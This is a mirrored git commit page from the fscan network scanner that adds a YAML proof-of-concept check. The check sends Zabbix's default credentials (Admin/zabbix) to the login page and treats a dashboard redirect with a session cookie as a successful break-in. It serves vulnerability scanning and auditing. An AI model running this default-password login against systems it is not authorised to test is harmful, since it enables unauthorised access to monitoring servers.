mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-13 21:02:44 +08:00
add zabbix-default-password.yml
This commit is contained in:
parent
842ee37594
commit
53df72db02
11
WebScan/pocs/zabbix-default-password.yml
Normal file
11
WebScan/pocs/zabbix-default-password.yml
Normal file
@ -0,0 +1,11 @@
|
||||
name: poc-yaml-zabbix-default-password
|
||||
rules:
|
||||
- method: POST
|
||||
path: /index.php
|
||||
body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
|
||||
expression: |
|
||||
response.status == 302 && response.headers["location"] == "zabbix.php?action=dashboard.view" && response.headers["set-cookie"].contains("zbx_session")
|
||||
detail:
|
||||
author: fuzz7j(https://github.com/fuzz7j)
|
||||
links:
|
||||
- https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/login
|
Loading…
Reference in New Issue
Block a user